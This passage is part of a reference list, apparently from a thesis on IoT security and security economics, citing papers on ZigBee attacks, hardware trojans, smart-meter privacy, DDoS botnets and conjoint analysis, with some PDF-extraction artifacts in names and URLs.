[141] J. Jacoby and L. B. Kaplan, “The components of perceived risk,” ACR Special Volumes, pp. 382–393, 1972. [Online]. Available: http://acrwebsite.org/volumes/12016/volumes/sv02/SV-02 [142] M. Jawurek, M. Johns, and F. Kerschbaum, “Plug-in privacy for smart metering billing,” in Privacy Enhancing Technologies - 11th International Symposium, PETS 2011, Waterloo, ON, Canada, July 27-29, 2011. Proceedings, ser. Lecture Notes in Computer Science, S. Fischer-Hübner and N. Hopper, Eds., vol. 6794. Springer, 2011, pp. 192–210. [Online]. Available: http://dx.doi.org/10.1007/978-3-642-22263-4 11 [143] M. Jawurek and F. Kerschbaum, “Privacy technologies for smart grids - a survey of options,” November 2012. [Online]. Available: https://www.microsoft.com/en-us/research/publication/privacy-technologies-for-smart-grids-a-survey-of-options/ [144] U. Jensen, P. Blank, P. Kugler, and B. Eskofier, “Unobtrusive and energy-efficient swimming exercise tracking using on-node processing,” IEEE Sensors Journal, vol. 16, no. 10, pp. 3972–3980, May 2016. [Online]. Available: https://doi.org/10.1109/JSEN.2016.2530019 [145] Y. J. Jia, Q. A. Chen, S. Wang, A. Rahmati, E. Fernandes, Z. M. Mao, and A. Prakash, “ContexIoT: Towards providing contextual integrity to appified IoT platforms,” in 24th Annual Network and Distributed System Security Symposium, NDSS 2017, San Diego, California, USA, February 26 - March 1, 2017. The Internet Society, 2017. [Online].


Available: https://www.ndss-symposium.org/ndss2017/ndss-2017-programme/contexlot-towards-providing-contextual-integrity-appified-iot-platforms/

[146] C. Jones and O. Bonsignour, The Economics of Software Quality. Pearson Educa- tion, 2011. [Online]. Available: https://books.google.de/books?id=oEPjYVfUR1wC

[147] H. Kagermann, J. Helbig, A. Hellinger, and W. Wahlster, Umset- zungsempfehlungen f¨urdas Zukunftsprojekt Industrie 4.0: Deutschlands Zukunft als Produktionsstandort sichern; Abschlussbericht des Arbeitskreises Industrie 4.0 (in German). Forschungsunion, 2013. [Online]. Available: https://www.bmbf.de/files/ Umsetzungsempfehlungen Industrie4 0.pdf [148] D. Kahneman, J. L. Knetsch, and R. H. Thaler, “Fairness and the assumptions of economics,” The Journal of Business, vol. 59, no. 4, pp. 285–300, 1986. [Online]. Available: http://www.jstor.org/stable/2352761 [149] P. G. Kelley, J. Bresee, L. F. Cranor, and R. W. Reeder, “A ”nutrition label” for privacy,” in Proceedings of the 5th Symposium on Usable Privacy and Security, SOUPS 2009, Mountain View, California, USA, July 15-17, 2009, ser. ACM International Conference Proceeding Series, L. F. Cranor, Ed. ACM, 2009. [Online]. Available: http://doi.acm.org/10.1145/1572532.1572538 [150] P. G. Kelley, L. Cesca, J. Bresee, and L. F. Cranor, “Standardizing privacy notices: An online study of the nutrition label approach,” in Proceedings of the 28th International Conference on Human Factors in Computing Systems, CHI 2010, Atlanta, Georgia, USA, April 10-15, 2010, E. D. Mynatt, D. Schoner, G. Fitzpatrick, S. E. Hudson, W. K. Edwards, and T. Rodden, Eds. ACM, 2010, pp. 1573–1582. [Online]. Available: http://doi.acm.org/10.1145/1753326.1753561 [151] Kerlink, “Kerlink continues global expansion with subsidiary in India for rollout of world’s largest LoRaWAN IoT network,” September 2017. [Online]. Available: https://www.kerlink.com/blog/2017/09/20/kerlink-continues- global-expansion-with-subsidiary-in-india/ [152] J. Y. Kim, R. Holz, W. Hu, and S. Jha, “Automated analysis of secure Internet of Things protocols,” in Proceedings of the 33rd Annual Computer Security Applications Conference, Orlando, FL, USA, December 4-8, 2017. ACM, 2017, pp. 238–249. [Online]. Available: http://doi.acm.org/10.1145/3134600.3134624 [153] J. Y. Kim, W. Hu, D. Sarkar, and S. Jha, “ESIoT: Enabling secure management of the Internet of Things,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 219–229. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098252 [154] S. T. King, J. Tucek, A. Cozzie, C. Grier, W. Jiang, and Y. Zhou, “Designing and implementing malicious hardware,” in First USENIX Workshop on Large-Scale Exploits and Emergent Threats, LEET ’08, San Francisco, CA, USA,


April 15, 2008, Proceedings, F. Monrose, Ed. USENIX Association, 2008. [Online]. Available: http://www.usenix.org/events/leet08/tech/full papers/king/king.pdf

[155] S. Kleber, H. F. Nölscher, and F. Kargl, “Automated PCB reverse engineering,” in 11th USENIX Workshop on Offensive Technologies, WOOT 2017, Vancouver, BC, Canada, August 14-15, 2017., W. Enck and C. Mulliner, Eds. USENIX Association, 2017. [Online]. Available: https://www.usenix.org/conference/woot17/workshop-program/presentation/kleber

[156] ——, “Automated PCB reverse engineering,” in 11th USENIX Workshop on Offensive Technologies, WOOT 2017, Vancouver, BC, Canada, August 14-15, 2017., W. Enck and C. Mulliner, Eds. USENIX Association, 2017. [Online]. Available: https://www.usenix.org/conference/woot17/workshop-program/presentation/kleber

[157] C. Kolias, G. Kambourakis, A. Stavrou, and J. M. Voas, “DDoS in the IoT: Mirai and other botnets,” IEEE Computer, vol. 50, no. 7, pp. 80–84, 2017. [Online]. Available: https://doi.org/10.1109/MC.2017.201

[158] M. Kooijman, “Arduino LoraMAC-in-C (LMiC) library.” [Online]. Available: https://github.com/matthijskooijman/arduino-lmic

[159] K. Korosec, “Ford’s executives really, really hated its MyFord touch infotainment system,” Fortune, October 2016. [Online]. Available: http://fortune.com/2016/10/07/myford-touch-lawsuit/

[160] N. Koschate-Fischer, I. V. Huber, and W. D. Hoyer, “When will price increases associated with company donations to charity be perceived as fair?” Journal of the Academy of Marketing Science, vol. 44, no. 5, pp. 608–626, Sep 2016. [Online]. Available: https://doi.org/10.1007/s11747-015-0454-5

[161] B. Krebs, “Hacked cameras, DVRs powered today’s massive Internet outage,” October 2016. [Online]. Available: https://krebsonsecurity.com/2016/10/hacked-cameras-dvrs-powered-todays-massive-internet-outage/

[162] M. Krotofil, A. A. Cárdenas, B. Manning, and J. Larsen, “CPS: Driving cyber-physical systems to unsafe operating conditions by timing DoS attacks on sensor signals,” in Proceedings of the 30th Annual Computer Security Applications Conference, ACSAC 2014, New Orleans, LA, USA, December 8-12, 2014, C. N. P. Jr., A. Hahn, K. R. B. Butler, and M. Sherr, Eds. ACM, 2014, pp. 146–155. [Online]. Available: http://doi.acm.org/10.1145/2664243.2664290

[163] R. Kumar, P. Jovanovic, W. P. Burleson, and I. Polian, “Parametric trojans for fault-injection attacks on cryptographic hardware,” in 2014 Workshop on Fault Diagnosis and Tolerance in Cryptography, FDTC 2014, Busan, South Korea, September 23, 2014, A. Tria and D. Choi, Eds. IEEE Computer Society, 2014, pp. 18–28. [Online]. Available: https://doi.org/10.1109/FDTC.2014.12


[164] K. Kursawe, G. Danezis, and M. Kohlweiss, “Privacy-friendly aggregation for the smart-grid,” in Privacy Enhancing Technologies - 11th International Symposium, PETS 2011, Waterloo, ON, Canada, July 27-29, 2011. Proceedings, ser. Lecture Notes in Computer Science, S. Fischer-H¨ubnerand N. Hopper, Eds., vol. 6794. Springer, 2011, pp. 175–191. [Online]. Available: http://dx.doi.org/10.1007/978-3- 642-22263-4 10 [165] T. Kushwaha and V. Shankar, “Are multichannel customers really more valuable? The moderating role of product category characteristics,” Journal of Marketing, vol. 77, no. 4, pp. 67–85, 2013. [Online]. Available: https://doi.org/10.1509/jm.11. 0297 [166] K. S. Kwak, S. Ullah, and N. Ullah, “An overview of IEEE 802.15.6 standard,” in 2010 3rd International Symposium on Applied Sciences in Biomedical and Communication Technologies (ISABEL 2010), November 2010, pp. 1–6. [Online]. Available: https://doi.org/10.1109/ISABEL.2010.5702867 [167] Y. Lai and P. Hsia, “Using the vulnerability information of computer systems to improve the network security,” Computer Communications, vol. 30, no. 9, pp. 2032–2047, 2007. [Online]. Available: https://doi.org/10.1016/j.comcom.2007.03.007 [168] K. P. Lam, M. H¨oynck, B. Dong, B. Andrews, Y. Chiou, D. Benitez, and J. Choi, “Occupancy detection through an extensive environmental sensor network in an open-plan office building,” in Proc. of Building Simulation 09, an IBPSA Conference, 2009. [169] R. Lange and E. W. Burger, “Long-term market implications of data breaches, not,” Journal of Information Privacy and Security, vol. 13, no. 4, pp. 186–206, 2017. [Online]. Available: https://doi.org/10.1080/15536548.2017.1394070 [170] H. Lasi, P. Fettke, H.-G. Kemper, T. Feld, and M. Hoffmann, “Industry 4.0,” Business & Information Systems Engineering, vol. 6, no. 4, pp. 239–242, August 2014. [Online]. Available: https://doi.org/10.1007/s12599-014-0334-4 [171] J. L´azaro, A. Astarloa, A. Zuloaga, U. Bidarte, and J. Jimenez, “I2CSec: A secure serial chip-to-chip communication protocol,” Journal of Systems Architecture - Embedded Systems Design, vol. 57, no. 2, pp. 206–213, 2011. [Online]. Available: https://doi.org/10.1016/j.sysarc.2010.12.001 [172] F. W. A. A. V. Leeuwen, “Network discovery with touchlink option,” February 2014, WO Patent App. PCT/IB2013/056,663. [Online]. Available: https://www.google.com/patents/WO2014030103A2 [173] J. Lei, N. Dawar, and Z. G¨urhan-Canli, “Base-rate information in consumer attributions of product-harm crises,” Journal of Marketing Research, vol. 49, no. 3, pp. 336–348, 2012. [Online]. Available: https://doi.org/10.1509/jmr.10.0197 [174] L. Lemaire, J. Vossaert, B. D. Decker, and V. Naessens, “Extending FAST-CPS for the analysis of data flows in cyber-physical systems,” in Computer Network Security


- 7th International Conference on Mathematical Methods, Models, and Architectures for Computer Network Security, MMM-ACNS 2017, Warsaw, Poland, August 28-30, 2017, Proceedings, ser. Lecture Notes in Computer Science, J. Rak, J. Bay, I. V. Kotenko, L. J. Popyack, V. A. Skormin, and K. Szczypiorski, Eds., vol. 10446. Springer, 2017, pp. 37–49. [Online]. Available: https://doi.org/10.1007/978-3-319- 65127-9 4 [175] A. Lengerer, J. Schroedter, M. Boehle, T. Hubert, and C. Wolf, “Datenhandbuch GESIS-Mikrozensus-Trendfile: Harmonisierung der Mikrozensen 1962 bis 2006 (in German),” 2010. [176] T. Lev¨aand H. Suomi, “Techno-economic feasibility analysis of Internet protocols: Framework and tools,” Computer Standards & Interfaces, vol. 36, no. 1, pp. 76–88, 2013. [Online]. Available: https://doi.org/10.1016/j.csi.2013.07.011 [177] E.´ Leverett, R. Clayton, and R. Anderson, “Standardisation and certification of the ‘Internet of Things’,” 16th Annual Workshop on the Economics of Information Security, WEIS 2017, University of California San Diego, CA, USA, June 26-27, 2017, 2017. [Online]. Available: http://www.cl.cam.ac.uk/∼rja14/Papers/weis2017. pdf [178] D. J. Leversage and E. J. James, “Estimating a system’s mean time-to-compromise,” IEEE Security & Privacy, vol. 6, no. 1, pp. 52–60, 2008. [Online]. Available: https://doi.org/10.1109/MSP.2008.9 [179] Library of Congress, “H.R.6 - Energy Independence and Security Act of 2007,” 2007. [Online]. Available: https://www.congress.gov/bill/110th-congress/house-bill/6 [180] LimeSurvey, “LimeSurvey: The online survey tool - Open source surveys,” 2018. [Online]. Available: https://www.limesurvey.org/ [181] L. Lin, M. Kasper, T. G¨uneysu, C. Paar, and W. Burleson, “Trojan side- channels: Lightweight hardware trojans through side-channel engineering,” in Cryptographic Hardware and Embedded Systems - CHES 2009, 11th International Workshop, Lausanne, Switzerland, September 6-9, 2009, Proceedings, ser. Lecture Notes in Computer Science, C. Clavier and K. Gaj, Eds., vol. 5747. Springer, 2009, pp. 382–395. [Online]. Available: https://doi.org/10.1007/978-3-642-04138-9 27 [182] T. Liu, Y. Gu, D. Wang, Y. Gui, and X. Guan, “A novel method to detect bad data injection attack in smart grid,” in Proceedings of the IEEE INFOCOM 2013, Turin, Italy, April 14-19, 2013. IEEE, 2013, pp. 3423–3428. [Online]. Available: https://doi.org/10.1109/INFCOM.2013.6567175

[183] LoRa Alliance, LoRaWAN Specification – Version 1.0.2, July 2016. [Online]. Available: https://lora-alliance.org/resource-hub/lorawantm-specification-v102 [184] ——, “LoRa Alliance surpasses 500 member mark and drives strong LoRaWAN protocol deployments,” June 2017. [Online]. Avail-


able: https://lora-alliance.org/in-the-news/lora-alliancetm-surpasses-500-member- mark-and-drives-strong-lorawantm-protocol [185] ——, “LoRaWAN global networks – Where are we today?” October 2017. [Online]. Available: https://docbox.etsi.org/Workshop/2017/201710 IoTWEEK/ WORKSHOP/S04 CONNECTING IoT/LoRaAlliance THUBERT.pdf [186] J. J. Louviere, T. N. Flynn, and R. T. Carson, “Discrete choice experiments are not conjoint analysis,” Journal of Choice Modelling, vol. 3, no. 3, pp. 57–72, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/pii/ S1755534513700149 [187] J. Lu, T. I. Sookoor, V. Srinivasan, G. Gao, B. Holben, J. A. Stankovic, E. Field, and K. Whitehouse, “The smart thermostat: using occupancy sensors to save energy in homes,” in Proceedings of the 8th International Conference on Embedded Networked Sensor Systems, SenSys 2010, Zurich, Switzerland, November 3-5, 2010, J. Beutel, D. Ganesan, and J. A. Stankovic, Eds. ACM, 2010, pp. 211–224. [Online]. Available: https://doi.org/10.1145/1869983.1870005 [188] X. Luo, H. Li, J. Zhang, and J. Shim, “Examining multi-dimensional trust and multi-faceted risk in initial acceptance of emerging technologies: An empirical study of mobile banking services,” Decision Support Systems, vol. 49, no. 2, pp. 222–234, 2010. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S016792361000045X [189] M. Lyu, D. Sherratt, A. Sivanathan, H. H. Gharakheili, A. Radford, and V. Sivaraman, “Quantifying the reflective DDoS attack capability of household IoT devices,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 46–51. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098264 [190] Machina Research, “With 3 billion connections, LPWA will dominate wide area wireless connectivity for M2M by 2023,” February 2015. [On- line]. Available: https://machinaresearch.com/news/with-3-billion-connections- lpwa-will-dominate-wide-area-wireless-connectivity-for-m2m-by-2023/ [191] S. B. MacKenzie, R. J. Lutz, and G. E. Belch, “The role of attitude toward the ad as a mediator of advertising effectiveness: A test of competing explanations,” Journal of Marketing Research, vol. 23, no. 2, pp. 130–143, 1986. [Online]. Available: http://www.jstor.org/stable/3151660 [192] J. Margulies, “Garage door openers: An Internet of Things case study,” IEEE Security & Privacy, vol. 13, no. 4, pp. 80–83, 2015. [Online]. Available: https://doi.org/10.1109/MSP.2015.80 [193] I. M. Martin, D. W. Stewart, and S. Matta, “Branding strategies, marketing communication, and perceived brand meaning: The transfer of purposive,


goal–oriented brand meaning to brand extensions,” Journal of the Academy of Marketing Science, vol. 33, no. 3, pp. 275–294, 2005. [Online]. Available: https://doi.org/10.1177/0092070304271197 [194] D. Mashima and A. A. C´ardenas, “Evaluating electricity theft detectors in smart grid networks,” in Research in Attacks, Intrusions, and Defenses - 15th International Symposium, RAID 2012, Amsterdam, The Netherlands, September 12- 14, 2012. Proceedings, ser. Lecture Notes in Computer Science, D. Balzarotti, S. J. Stolfo, and M. Cova, Eds., vol. 7462. Springer, 2012, pp. 210–229. [Online]. Available: https://doi.org/10.1007/978-3-642-33338-5 11 [195] M. K. Masood, Y. C. Soh, and V. W. Chang, “Real-time occupancy estimation using environmental parameters,” in 2015 International Joint Conference on Neural Networks, IJCNN 2015, Killarney, Ireland, July 12-17, 2015. IEEE, 2015, pp. 1–8. [Online]. Available: http://dx.doi.org/10.1109/IJCNN.2015.7280781 [196] A. Mathur and M. Chetty, “Impact of user characteristics on attitudes towards automatic mobile application updates,” in Thirteenth Symposium on Usable Privacy and Security, SOUPS 2017, Santa Clara, CA, USA, July 12-14, 2017. USENIX Association, 2017, pp. 175–193. [Online]. Available: https://www.usenix.org/ conference/soups2017/technical-sessions/presentation/mathur

[197] C. Mathwick and E. Rigdon, “Play, flow, and the online search experience,” Journal of Consumer Research, vol. 31, no. 2, pp. 324–332, 2004. [Online]. Available: http://dx.doi.org/10.1086/422111 [198] S. Mattejat, “Traffic analysis and denial-of-service attacks in connected lighting systems,” Bachelor’s thesis, Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany, June 2016. [199] McAfee, “New security priorities in an increasingly connected world,” January 2018. [Online]. Available: https://securingtomorrow.mcafee.com/consumer/key-findings-from-our-survey-on-identity-theft-family-safety-and-home-network-security/ [200] H. D. Mehr, H. Polat, and A. Cetin, “Resident activity recognition in smart homes by using artificial neural networks,” in 2016 4th International Istanbul Smart Grid Congress and Fair (ICSG), April 2016, pp. 1–5. [Online]. Available: https://doi.org/10.1109/SGCF.2016.7492428 [201] P. Mell, K. Scarfone, and S. Romanosky, “A complete guide to the common vulnerability scoring system,” 2007. [Online]. Available: http://www.first.org/cvss/cvss-guide.pdf [202] Merriam Webster Dictionary, “Definition of Internet of Things,” 2018. [Online]. Available: https://www.merriam-webster.com/dictionary/Internet%20of%20Things [203] K. M. Miller, R. Hofstetter, H. Krohmer, and Z. J. Zhang, “How should consumers’ willingness to pay be measured? An empirical comparison of state-of-the-art


approaches,” Journal of Marketing Research, vol. 48, no. 1, pp. 172–184, 2011. [Online]. Available: https://doi.org/10.1509/jmkr.48.1.172

[204] H. Min and G. Zhou, “Supply chain modeling: Past, present and future,” Computers & Industrial Engineering, vol. 43, no. 1, pp. 231–249, 2002. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0360835202000669

[205] R. Minerva, A. Biru, and D. Rotondi, “Towards a definition of the Internet of Things (IoT) – Revision 1,” IEEE Internet Initiative, May 2015. [Online]. Available: https://iot.ieee.org/definition.html

[206] M. Mohsin, Z. Anwar, F. Zaman, and E. Al-Shaer, “IoTChecker: A data-driven framework for security analytics of Internet of Things configurations,” Computers & Security, vol. 70, pp. 199–223, 2017. [Online]. Available: https://doi.org/10. 1016/j.cose.2017.05.012

[207] A. Molina-Markham, P. Shenoy, K. Fu, E. Cecchet, and D. Irwin, “Private memoirs of a smart meter,” in Proceedings of the 2nd ACM Workshop on Embedded Sensing Systems for Energy-Efficiency in Building, ser. BuildSys ’10. New York, NY, USA: ACM, 2010, pp. 61–66. [Online]. Available: http://doi.acm.org/10.1145/1878431. 1878446

[208] P. Morgner and Z. Benenson, “Exploring security economics in IoT standardization efforts,” in Proceedings of the NDSS Workshop on Decentralized IoT Security and Standards, DISS’18, San Diego, CA, USA, February 18, 2018, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/ 07/diss2018 9 Morgner paper.pdf

[209] P. Morgner, Z. Benenson, C. Müller, and F. Armknecht, “Design space of smart home networks from a security perspective,” in Proceedings of the 14. GI/ITG KuVS Fachgespräch Sensornetze (FGSN 2015), Erlangen, Germany, September 23-24, 2015, 2015, pp. 41–44. [Online]. Available: https://core.ac.uk/download/pdf/86433152.pdf

[210] P. Morgner, F. Freiling, and Z. Benenson, “Opinion: Security lifetime labels - Overcoming information asymmetry in security of IoT consumer products,” in Proceedings of the 11th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WiSec 2018, Stockholm, Sweden, June 18-20, 2018, P. Papadimitratos, K. Butler, and C. Pöpper, Eds. ACM, 2018, pp. 208–211. [Online]. Available: http://doi.acm.org/10.1145/3212480.3212486

[211] P. Morgner, C. Mai, N. Koschate-Fischer, F. Freiling, and Z. Benenson, “Security update labels: Establishing economic incentives for security patching of IoT con- sumer products,” To appear in the Proceedings of the IEEE Symposium on Security and Privacy (S&P), May 2020, IEEE Computer Society, 2020. [212] P. Morgner, S. Mattejat, and Z. Benenson, “All your bulbs are belong to us:


Investigating the current state of security in connected lighting systems,” CoRR, vol. abs/1608.03732, 2016. [Online]. Available: http://arxiv.org/abs/1608.03732 [213] P. Morgner, S. Mattejat, Z. Benenson, C. Müller, and F. Armknecht, “Insecure to the touch: Attacking ZigBee 3.0 via touchlink commissioning,” in Proceedings of the 10th ACM Conference on Security and Privacy in Wireless and Mobile Networks, WiSec 2017, Boston, MA, USA, July 18-20, 2017, G. Noubir, M. Conti, and S. K. Kasera, Eds. ACM, 2017, pp. 230–240. [Online]. Available: http://doi.acm.org/10.1145/3098243.3098254 [214] P. Morgner, C. Müller, M. Ring, B. Eskofier, C. Riess, F. Armknecht, and Z. Benenson, “Privacy implications of room climate data,” in Computer Security - ESORICS 2017 - 22nd European Symposium on Research in Computer Security, Oslo, Norway, September 11-15, 2017, Proceedings, Part II, ser. Lecture Notes in Computer Science, S. N. Foley, D. Gollmann, and E. Snekkenes, Eds., vol. 10493. Springer, 2017, pp. 324–343. [Online]. Available: https://doi.org/10.1007/978-3-319-66399-9 18 [215] P. Morgner, S. Pfennig, D. Salzner, and Z. Benenson, “Malicious IoT implants: Tampering with serial communication over the Internet,” in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 535–555. [Online]. Available: https://doi.org/10.1007/978-3-030-00470-5 25 [216] Moteiv Corporation, “Tmote Sky datasheet,” Moteiv Corporation, 2006. [Online]. Available: https://www.snm.ethz.ch/snmwiki/pub/uploads/Projects/tmote sky datasheet.pdf [217] S. J. Murdoch, M. Bond, and R. Anderson, “How certification systems fail: Lessons from the Ware report,” IEEE Security & Privacy, vol. 10, no. 6, pp. 40–44, 2012. [Online]. Available: https://doi.org/10.1109/MSP.2012.89 [218] M. Natter and M. Feurstein, “Real world performance of choice-based conjoint models,” European Journal of Operational Research, vol. 137, no. 2, pp. 448–458, 2002, graphs and Scheduling. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0377221701001473

[219] P. Nelson, “Information and consumer behavior,” Journal of Political Economy, vol. 78, no. 2, pp. 311–329, 1970. [Online]. Available: https://doi.org/10.1086/259630 [220] Nest, “Privacy statement for Nest products and services,” March 2016. [Online]. Available: https://nest.com/legal/privacy-statement-for-nest-products- and-services/ [221] S. Notra, M. Siddiqi, H. H. Gharakheili, V. Sivaraman, and R. Boreli, “An experimental study of security and privacy risks with emerging household


appliances,” in IEEE Conference on Communications and Network Security, CNS 2014, San Francisco, CA, USA, October 29-31, 2014. IEEE, 2014, pp. 79–84. [Online]. Available: https://doi.org/10.1109/CNS.2014.6997469 [222] NXP, “The I2C-bus specification and user manual – UM10204,” April 2014. [Online]. Available: https://www.nxp.com/docs/en/user-guide/UM10204.pdf [223] J. Oberg, W. Hu, A. Irturk, M. Tiwari, T. Sherwood, and R. Kastner, “Information flow isolation in I2C and USB,” in Proceedings of the 48th Design Automation Conference, DAC 2011, San Diego, California, USA, June 5-10, 2011, L. Stok, N. D. Dutt, and S. Hassoun, Eds. ACM, 2011, pp. 254–259. [Online]. Available: https://doi.org/10.1145/2024724.2024782 [224] O. Olawumi, K. Haataja, M. Asikainen, N. Vidgren, and P. Toivanen, “Three practical attacks against ZigBee security: Attack scenario definitions, practical experiments, countermeasures, and lessons learned,” in 14th International Conference on Hybrid Intelligent Systems, HIS 2014, Kuwait, December 14-16, 2014. IEEE, 2014, pp. 199–206. [Online]. Available: http://dx.doi.org/10.1109/HIS.2014. 7086198

[225] B. Orme, “Interpreting conjoint analysis data,” Getting Started with Conjoint Analysis: Strategies for Product Design and Pricing Research, 2010. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/interpca.pdf

[226] ——, “Sample size issues for conjoint analysis studies,” Getting Started with Conjoint Analysis: Strategies for Product Design and Pricing Research, 2010. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/samplesz.pdf

[227] ——, “Which conjoint method should I use,” Sawtooth Software Research Paper Series, 2014. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/which conjoint v7.pdf [228] Oxford Dictionary, “Definition of Internet of Things in English,” 2018. [Online]. Available: https://en.oxforddictionaries.com/definition/internet of things [229] Y. M. P. Pa, S. Suzuki, K. Yoshioka, T. Matsumoto, T. Kasama, and C. Rossow, “IoTPOT: Analysing the rise of IoT compromises,” in 9th USENIX Workshop on Offensive Technologies, WOOT ’15, Washington, DC, USA, August 10-11, 2015., A. Francillon and T. Ptacek, Eds. USENIX Association, 2015. [Online]. Available: https://www.usenix.org/conference/woot15/workshop-program/presentation/pa [230] D. Palmer, “Security flaw in LG IoT software left home appliances vulnerable,” ZDNet, October 2017. [Online]. Available: http://www.zdnet.com/article/security-flaw-in-lg-iot-software-left-home-appliances-vulnerable/ [231] Y. Park, Y. Son, H. Shin, D. Kim, and Y. Kim, “This ain’t your dose: Sensor spoofing attack on medical infusion pump,” in 10th USENIX Workshop on Offensive Technologies, WOOT 16, Austin, TX, USA, August 8-9, 2016., N. Silvanovich and


P. Traynor, Eds. USENIX Association, 2016. [Online]. Available: https://www.usenix.org/conference/woot16/workshop-program/presentation/park

[232] M. V. Pauly, “The economics of moral hazard: Comment,” The American Economic Review, vol. 58, no. 3, pp. 531–537, 1968. [Online]. Available: http://www.jstor.org/stable/1813785 [233] T. H. Pedersen, K. U. Nielsen, and S. Petersen, “Method for room occupancy detection based on trajectory of indoor climate sensor data,” Building and Environment, vol. 115, pp. 147–156, 2017. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0360132317300367 [234] S. Pfennig, “Implementation and evaluation of hardware implants,” Master’s thesis, Friedrich-Alexander-Universit¨atErlangen-N¨urnberg, Germany, January 2018. [235] Philips, “Friends of hue - update,” December 2015. [Online]. Available: http://www.developers.meethue.com/documentation/friends-hue-update [236] J. Picod, A. Lebrun, and J. Demay, “Bringing software defined radio to the penetration testing community,” in Black Hat USA, 2014. [Online]. Available: https://www.blackhat.com/docs/us-14/materials/us-14-Picod-Bringing- Software-Defined-Radio-To-The-Penetration-Testing-Community-WP.pdf [237] J. Pinnell, “Comment on Huber: Practical suggestions for CBC stud- ies,” Sawtooth Software Research Paper Series, 2005. [Online]. Available: https://www.sawtoothsoftware.com/support/technical-papers/cbc-related-papers/ the-benefits-of-accounting-for-respondent-heterogeneity-in-choice-modeling-1999

[238] R Core Team, R: A Language and Environment for Statistical Computing, R Foundation for Statistical Computing, Vienna, Austria, 2014. [Online]. Available: http://www.R-project.org

[239] M. Rahnema, “Overview of the GSM system and protocol architecture,” IEEE Communications Magazine, vol. 31, no. 4, pp. 92–100, April 1993. [Online]. Available: https://doi.org/10.1109/35.210402

[240] L. Rainie and M. Duggan, “Pew Research: Privacy and Information Sharing,” January 2016. [Online]. Available: http://www.pewinternet.org/2016/01/14/privacy-and-information-sharing

[241] S. Ray, T. Hoque, A. Basak, and S. Bhunia, “The power play: Security-energy trade-offs in the IoT regime,” in 34th IEEE International Conference on Computer Design, ICCD 2016, 2016, pp. 690–693.

[242] E. M. Redmiles, S. Kross, and M. L. Mazurek, “How well do my results generalize? Comparing security and privacy survey results from MTurk, web, and telephone samples,” in 2019 IEEE Symposium on Security and Privacy (SP), 2019, pp. 227–244. [Online]. Available: https://doi.ieeecomputersociety.org/10.1109/SP.2019.00014

[243] E. M. Redmiles, M. L. Mazurek, and J. P. Dickerson, “Dancing pigs or externalities? Measuring the rationality of security decisions,” in Proceedings of the 2018 ACM Conference on Economics and Computation, Ithaca, NY, USA, É. Tardos, E. Elkind, and R. Vohra, Eds. ACM, 2018, pp. 215–232. [Online]. Available: https://doi.org/10.1145/3219166.3219185

[244] C. Reichert, “NNN Co and Actility announce LoRaWAN network rollout across Australia,” ZDNet, February 2017. [Online]. Available: https://www.zdnet.com/article/nnn-co-and-actility-announce-lorawan-network-rollout-across-australia/

[245] A. Reinhardt, F. Englert, and D. Christin, “Averting the privacy risks of smart metering by local data preprocessing,” Pervasive and Mobile Computing, vol. 16, pp. 171–183, 2015. [Online]. Available: https://doi.org/10.1016/j.pmcj.2014.10.002

[246] A. Rial and G. Danezis, “Privacy-preserving smart metering,” in Proceedings of the 10th Annual ACM Workshop on Privacy in the Electronic Society, ser. WPES ’11. New York, NY, USA: ACM, 2011, pp. 49–60. [Online]. Available: http://doi.acm.org/10.1145/2046556.2046564

[247] M. Ring, U. Jensen, P. Kugler, and B. Eskofier, “Software-based performance and complexity analysis for the design of embedded classification systems,” in Proceedings of the 21st International Conference on Pattern Recognition, ICPR 2012, Tsukuba, Japan, November 11-15, 2012. IEEE Computer Society, 2012, pp. 2266–2269. [Online]. Available: http://ieeexplore.ieee.org/xpl/freeabs_all.jsp?arnumber=6460616

[248] E. Ronen, C. O’Flynn, A. Shamir, and A. Weingarten, “IoT goes nuclear: Creating a ZigBee chain reaction,” in 2017 IEEE Symposium on Security and Privacy, SP 2017, San Jose, CA, USA. IEEE Computer Society, 2017, pp. 195–212. [Online]. Available: https://doi.org/10.1109/SP.2017.14

[249] E. Ronen and A. Shamir, “Extended functionality attacks on IoT devices: The case of smart lights,” in IEEE European Symposium on Security and Privacy, EuroS&P 2016, Saarbrücken, Germany, March 21-24, 2016. IEEE, 2016, pp. 3–12. [Online]. Available: http://dx.doi.org/10.1109/EuroSP.2016.13

[250] M. Rostami, F. Koushanfar, J. Rajendran, and R. Karri, “Hardware security: Threat models and metrics,” in The IEEE/ACM International Conference on Computer-Aided Design, ICCAD’13, San Jose, CA, USA, November 18-21, 2013, J. Henkel, Ed. IEEE, 2013, pp. 819–823. [Online]. Available: https://doi.org/10.1109/ICCAD.2013.6691207

[251] M. Ryan and J. Hughes, “Using conjoint analysis to assess women’s preferences for miscarriage management,” Health Economics, vol. 6, no. 3, pp. 261–273, 1997. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10.1002/(SICI)1099-1050(199705)6:3<261::AID-HEC262>3.0.CO;2-N

